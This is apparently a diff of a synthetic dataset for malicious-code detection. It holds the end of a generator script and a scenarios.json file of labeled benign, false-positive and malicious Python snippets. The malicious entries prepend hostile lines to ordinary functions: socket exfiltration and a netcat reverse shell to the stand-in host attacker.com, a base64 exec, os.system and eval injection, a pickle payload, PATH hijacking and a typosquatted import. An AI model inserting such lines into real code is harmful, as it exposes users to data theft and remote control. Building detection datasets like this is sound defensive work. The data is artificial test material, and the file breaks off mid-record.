    # dirname() is "" for a bare file name, and os.makedirs("") raises
    # FileNotFoundError, so only create the directory when there is one.
    if output_parent:
        os.makedirs(output_parent, exist_ok=True)
    with open(args.output, "w", encoding="utf-8") as f:
        json.dump(scenarios, f, indent=4)

    malicious_total = sum(1 for s in scenarios if s['label'] == 'malicious')
    benign_total = sum(1 for s in scenarios if s['label'] == 'benign')
    print(f"Total scenarios: {len(scenarios)}")
    print(f" Malicious: {malicious_total}")
    print(f" Benign: {benign_total}")
    print(f"Saved to {args.output}")


if __name__ == "__main__":
    main()
sentinel_synth/data/scenarios.json ADDED
@@ -0,0 +1,402 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [
2
+ {
3
+ "id": "fp_4cc36ade",
4
+ "type": "false_positive",
5
+ "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
6
+ "patch": null,
7
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
8
+ "label": "benign",
9
+ "source": "mutation_engine",
10
+ "attack_type": null
11
+ },
12
+ {
13
+ "id": "fp_dd7e5a4d",
14
+ "type": "false_positive",
15
+ "code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
16
+ "patch": null,
17
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
18
+ "label": "benign",
19
+ "source": "mutation_engine",
20
+ "attack_type": null
21
+ },
22
+ {
23
+ "id": "tp_7ffae123",
24
+ "type": "true_positive",
25
+ "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
26
+ "patch": "def bubble_sort(arr):\n \"\"\"Sort an array using bubble sort.\"\"\"\n n = len(arr)\n for i in range(n):\n for j in range(0, n-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n return arr",
27
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
28
+ "label": "malicious",
29
+ "source": "mutation_engine",
30
+ "attack_type": "obfuscated_exec"
31
+ },
32
+ {
33
+ "id": "fp_6ab25c4e",
34
+ "type": "false_positive",
35
+ "code_snippet": "import os\n# Setup proxy\nos.environ['HTTP_PROXY'] = 'http://proxy.local:8080'\n\ndef factorial(n):\n \"\"\"Calculate the factorial of a number.\"\"\"\n if n == 0:\n return 1\n return n * factorial(n - 1)",
36
+ "patch": null,
37
+ "unit_test_code": "import code\nassert code.factorial(5) == 120\n",
38
+ "label": "benign",
39
+ "source": "mutation_engine",
40
+ "attack_type": null
41
+ },
42
+ {
43
+ "id": "tp_c9e41cb4",
44
+ "type": "true_positive",
45
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
46
+ "patch": "def matrix_addition(mat1, mat2):\n \"\"\"Add two matrices.\"\"\"\n return [[mat1[i][j] + mat2[i][j] for j in range(len(mat1[0]))] for i in range(len(mat1))]",
47
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
48
+ "label": "malicious",
49
+ "source": "mutation_engine",
50
+ "attack_type": "env_hijack"
51
+ },
52
+ {
53
+ "id": "tp_5593ef6c",
54
+ "type": "true_positive",
55
+ "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
56
+ "patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
57
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
58
+ "label": "malicious",
59
+ "source": "mutation_engine",
60
+ "attack_type": "malicious_import"
61
+ },
62
+ {
63
+ "id": "fn_69406790",
64
+ "type": "functional",
65
+ "code_snippet": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
66
+ "patch": null,
67
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
68
+ "label": "benign",
69
+ "source": "mutation_engine",
70
+ "attack_type": null
71
+ },
72
+ {
73
+ "id": "tp_76aa219b",
74
+ "type": "true_positive",
75
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
76
+ "patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
77
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
78
+ "label": "malicious",
79
+ "source": "mutation_engine",
80
+ "attack_type": "socket_exfil"
81
+ },
82
+ {
83
+ "id": "fp_661ae03e",
84
+ "type": "false_positive",
85
+ "code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\nclass Queue:\n \"\"\"A simple queue implementation.\"\"\"\n def __init__(self):\n self.items = []\n \n def enqueue(self, item):\n self.items.insert(0, item)\n \n def dequeue(self):\n if not self.is_empty():\n return self.items.pop()\n return None\n \n def is_empty(self):\n return len(self.items) == 0",
86
+ "patch": null,
87
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
88
+ "label": "benign",
89
+ "source": "mutation_engine",
90
+ "attack_type": null
91
+ },
92
+ {
93
+ "id": "fn_afb2fb13",
94
+ "type": "functional",
95
+ "code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
96
+ "patch": null,
97
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
98
+ "label": "benign",
99
+ "source": "mutation_engine",
100
+ "attack_type": null
101
+ },
102
+ {
103
+ "id": "fn_7d9c3863",
104
+ "type": "functional",
105
+ "code_snippet": "def binary_search(arr, target):\n \"\"\"Perform binary search.\"\"\"\n low = 0\n high = len(arr) - 1\n while low <= high:\n mid = (low + high) // 2\n if arr[mid] == target:\n return mid\n elif arr[mid] < target:\n low = mid + 1\n else:\n high = mid - 1\n return -1",
106
+ "patch": null,
107
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
108
+ "label": "benign",
109
+ "source": "mutation_engine",
110
+ "attack_type": null
111
+ },
112
+ {
113
+ "id": "fn_81a53eff",
114
+ "type": "functional",
115
+ "code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
116
+ "patch": null,
117
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
118
+ "label": "benign",
119
+ "source": "mutation_engine",
120
+ "attack_type": null
121
+ },
122
+ {
123
+ "id": "tp_dd51805d",
124
+ "type": "true_positive",
125
+ "code_snippet": "exec(base64.b64decode('cHJpbnQoIkhlbGxvIGZyb20gaGlkZGVuIGV4ZWMhIik='))\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
126
+ "patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
127
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
128
+ "label": "malicious",
129
+ "source": "mutation_engine",
130
+ "attack_type": "obfuscated_exec"
131
+ },
132
+ {
133
+ "id": "tp_82f7c7df",
134
+ "type": "true_positive",
135
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
136
+ "patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
137
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
138
+ "label": "malicious",
139
+ "source": "mutation_engine",
140
+ "attack_type": "env_hijack"
141
+ },
142
+ {
143
+ "id": "tp_4112a517",
144
+ "type": "true_positive",
145
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
146
+ "patch": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
147
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
148
+ "label": "malicious",
149
+ "source": "mutation_engine",
150
+ "attack_type": "socket_exfil"
151
+ },
152
+ {
153
+ "id": "fp_1a5da2e5",
154
+ "type": "false_positive",
155
+ "code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
156
+ "patch": null,
157
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
158
+ "label": "benign",
159
+ "source": "mutation_engine",
160
+ "attack_type": null
161
+ },
162
+ {
163
+ "id": "tp_3fa65759",
164
+ "type": "true_positive",
165
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
166
+ "patch": "def caesar_cipher(text, shift):\n \"\"\"Apply Caesar cipher to text.\"\"\"\n result = \"\"\n for char in text:\n if char.isalpha():\n start = ord('a') if char.islower() else ord('A')\n result += chr((ord(char) - start + shift) % 26 + start)\n else:\n result += char\n return result",
167
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
168
+ "label": "malicious",
169
+ "source": "mutation_engine",
170
+ "attack_type": "socket_exfil"
171
+ },
172
+ {
173
+ "id": "fn_c40125ae",
174
+ "type": "functional",
175
+ "code_snippet": "def read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
176
+ "patch": null,
177
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
178
+ "label": "benign",
179
+ "source": "mutation_engine",
180
+ "attack_type": null
181
+ },
182
+ {
183
+ "id": "tp_7ac28ccc",
184
+ "type": "true_positive",
185
+ "code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
186
+ "patch": "def format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
187
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
188
+ "label": "malicious",
189
+ "source": "mutation_engine",
190
+ "attack_type": "eval_hidden"
191
+ },
192
+ {
193
+ "id": "tp_e1848067",
194
+ "type": "true_positive",
195
+ "code_snippet": "import pickle\npickle.loads(b\"c__builtin__\\neval\\n(Vprint('malicious')\\ntR.\")\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
196
+ "patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
197
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
198
+ "label": "malicious",
199
+ "source": "mutation_engine",
200
+ "attack_type": "pickle_deserialization"
201
+ },
202
+ {
203
+ "id": "fp_382449d8",
204
+ "type": "false_positive",
205
+ "code_snippet": "import base64\ndef encode_msg(msg):\n return base64.b64encode(msg.encode())\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
206
+ "patch": null,
207
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
208
+ "label": "benign",
209
+ "source": "mutation_engine",
210
+ "attack_type": null
211
+ },
212
+ {
213
+ "id": "fp_5448737e",
214
+ "type": "false_positive",
215
+ "code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef format_iso_date(year, month, day):\n \"\"\"Format date components into an ISO 8601 string.\"\"\"\n return f\"{year:04d}-{month:02d}-{day:02d}\"",
216
+ "patch": null,
217
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
218
+ "label": "benign",
219
+ "source": "mutation_engine",
220
+ "attack_type": null
221
+ },
222
+ {
223
+ "id": "tp_067c7620",
224
+ "type": "true_positive",
225
+ "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
226
+ "patch": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
227
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
228
+ "label": "malicious",
229
+ "source": "mutation_engine",
230
+ "attack_type": "malicious_import"
231
+ },
232
+ {
233
+ "id": "tp_30239b19",
234
+ "type": "true_positive",
235
+ "code_snippet": "__import__('os').system('echo pwned > /tmp/pwned')\n\ndef render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
236
+ "patch": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
237
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
238
+ "label": "malicious",
239
+ "source": "mutation_engine",
240
+ "attack_type": "malicious_import"
241
+ },
242
+ {
243
+ "id": "fn_cf514ff8",
244
+ "type": "functional",
245
+ "code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
246
+ "patch": null,
247
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
248
+ "label": "benign",
249
+ "source": "mutation_engine",
250
+ "attack_type": null
251
+ },
252
+ {
253
+ "id": "tp_b9c23fd5",
254
+ "type": "true_positive",
255
+ "code_snippet": "import pythonn\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
256
+ "patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
257
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
258
+ "label": "malicious",
259
+ "source": "mutation_engine",
260
+ "attack_type": "typosquatting"
261
+ },
262
+ {
263
+ "id": "tp_18963f71",
264
+ "type": "true_positive",
265
+ "code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
266
+ "patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
267
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
268
+ "label": "malicious",
269
+ "source": "mutation_engine",
270
+ "attack_type": "eval_hidden"
271
+ },
272
+ {
273
+ "id": "tp_4c4f927a",
274
+ "type": "true_positive",
275
+ "code_snippet": "import subprocess\ntry:\n subprocess.call(['nc', '-e', '/bin/sh', 'attacker.com', '4444'])\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
276
+ "patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
277
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
278
+ "label": "malicious",
279
+ "source": "mutation_engine",
280
+ "attack_type": "subprocess_backdoor"
281
+ },
282
+ {
283
+ "id": "tp_4ea9d228",
284
+ "type": "true_positive",
285
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
286
+ "patch": "def word_count(text):\n \"\"\"Count occurrences of words in text.\"\"\"\n words = text.split()\n counts = {}\n for word in words:\n counts[word] = counts.get(word, 0) + 1\n return counts",
287
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
288
+ "label": "malicious",
289
+ "source": "mutation_engine",
290
+ "attack_type": "env_hijack"
291
+ },
292
+ {
293
+ "id": "tp_f417c9df",
294
+ "type": "true_positive",
295
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
296
+ "patch": "def is_prime(n):\n \"\"\"Check if a number is prime.\"\"\"\n if n <= 1:\n return False\n for i in range(2, int(n ** 0.5) + 1):\n if n % i == 0:\n return False\n return True",
297
+ "unit_test_code": "import code\nassert code.is_prime(7) == True\n",
298
+ "label": "malicious",
299
+ "source": "mutation_engine",
300
+ "attack_type": "env_hijack"
301
+ },
302
+ {
303
+ "id": "tp_bde0820e",
304
+ "type": "true_positive",
305
+ "code_snippet": "import os\nos.environ['PATH'] = '/tmp:' + os.environ.get('PATH', '')\n\ndef parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
306
+ "patch": "def parse_csv(csv_content):\n \"\"\"Parse simple CSV content.\"\"\"\n lines = csv_content.strip().split('\\n')\n if not lines:\n return []\n headers = lines[0].split(',')\n result = []\n for line in lines[1:]:\n values = line.split(',')\n result.append(dict(zip(headers, values)))\n return result",
307
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
308
+ "label": "malicious",
309
+ "source": "mutation_engine",
310
+ "attack_type": "env_hijack"
311
+ },
312
+ {
313
+ "id": "fn_d6a7e145",
314
+ "type": "functional",
315
+ "code_snippet": "class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n \"\"\"A simple linked list.\"\"\"\n def __init__(self):\n self.head = None\n \n def append(self, data):\n new_node = Node(data)\n if not self.head:\n self.head = new_node\n return\n last = self.head\n while last.next:\n last = last.next\n last.next = new_node",
316
+ "patch": null,
317
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
318
+ "label": "benign",
319
+ "source": "mutation_engine",
320
+ "attack_type": null
321
+ },
322
+ {
323
+ "id": "tp_69568e28",
324
+ "type": "true_positive",
325
+ "code_snippet": "import socket\ntry:\n s = socket.socket()\n s.connect(('attacker.com', 80))\n s.sendall(b'exfiltrated data')\nexcept:\n pass\n\ndef generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
326
+ "patch": "def generate_slug(title):\n \"\"\"Generate a URL-friendly slug.\"\"\"\n import re\n title = title.lower()\n title = re.sub(r'[^a-z0-9\\s-]', '', title)\n return re.sub(r'[\\s-]+', '-', title).strip('-')",
327
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
328
+ "label": "malicious",
329
+ "source": "mutation_engine",
330
+ "attack_type": "socket_exfil"
331
+ },
332
+ {
333
+ "id": "fn_7abd4b1e",
334
+ "type": "functional",
335
+ "code_snippet": "def basic_calculator(a, b, op):\n \"\"\"Perform a basic math operation.\"\"\"\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n elif op == '/':\n if b == 0:\n raise ValueError(\"Division by zero\")\n return a / b\n return None",
336
+ "patch": null,
337
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
338
+ "label": "benign",
339
+ "source": "mutation_engine",
340
+ "attack_type": null
341
+ },
342
+ {
343
+ "id": "fp_56b026a4",
344
+ "type": "false_positive",
345
+ "code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef parse_logs(log_lines):\n \"\"\"Parse simple log lines into level and message.\"\"\"\n parsed = []\n for line in log_lines:\n parts = line.split(' - ', 1)\n if len(parts) == 2:\n parsed.append({\"level\": parts[0].strip('[]'), \"message\": parts[1]})\n return parsed",
346
+ "patch": null,
347
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
348
+ "label": "benign",
349
+ "source": "mutation_engine",
350
+ "attack_type": null
351
+ },
352
+ {
353
+ "id": "fn_9691b992",
354
+ "type": "functional",
355
+ "code_snippet": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
356
+ "patch": null,
357
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
358
+ "label": "benign",
359
+ "source": "mutation_engine",
360
+ "attack_type": null
361
+ },
362
+ {
363
+ "id": "fp_477c7ba9",
364
+ "type": "false_positive",
365
+ "code_snippet": "def safe_calc(expr):\n # Legit eval in controlled env\n return eval(expr, {'__builtins__': {}}, {})\n\ndef read_ini_config(content):\n \"\"\"Read a simple INI configuration.\"\"\"\n config = {}\n current_section = None\n for line in content.split('\\n'):\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n if line.startswith('[') and line.endswith(']'):\n current_section = line[1:-1]\n config[current_section] = {}\n elif '=' in line and current_section:\n key, val = line.split('=', 1)\n config[current_section][key.strip()] = val.strip()\n return config",
366
+ "patch": null,
367
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
368
+ "label": "benign",
369
+ "source": "mutation_engine",
370
+ "attack_type": null
371
+ },
372
+ {
373
+ "id": "fp_f65258dd",
374
+ "type": "false_positive",
375
+ "code_snippet": "import requests\n# Just checking internet\ntry:\n requests.get('https://8.8.8.8', timeout=1)\nexcept:\n pass\n\ndef celsius_to_fahrenheit(c):\n \"\"\"Convert Celsius to Fahrenheit.\"\"\"\n return (c * 9/5) + 32\n\ndef fahrenheit_to_celsius(f):\n \"\"\"Convert Fahrenheit to Celsius.\"\"\"\n return (f - 32) * 5/9",
376
+ "patch": null,
377
+ "unit_test_code": "import code\nassert code.celsius_to_fahrenheit(0) == 32\n",
378
+ "label": "benign",
379
+ "source": "mutation_engine",
380
+ "attack_type": null
381
+ },
382
+ {
383
+ "id": "fn_7ed224be",
384
+ "type": "functional",
385
+ "code_snippet": "def render_template(template, context):\n \"\"\"Simple template rendering replacing {{key}}.\"\"\"\n result = template\n for key, value in context.items():\n result = result.replace(f\"{{{{{key}}}}}\", str(value))\n return result",
386
+ "patch": null,
387
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
388
+ "label": "benign",
389
+ "source": "mutation_engine",
390
+ "attack_type": null
391
+ },
392
+ {
393
+ "id": "tp_6523f26b",
394
+ "type": "true_positive",
395
+ "code_snippet": "def safe_eval(x):\n return eval(x)\nsafe_eval('__import__(\"os\").system(\"echo 1\")')\n\ndef is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
396
+ "patch": "def is_anagram(s1, s2):\n \"\"\"Check if two strings are anagrams.\"\"\"\n return sorted(s1.replace(\" \", \"\").lower()) == sorted(s2.replace(\" \", \"\").lower())",
397
+ "unit_test_code": "import code\nassert True # module loaded successfully\n",
398
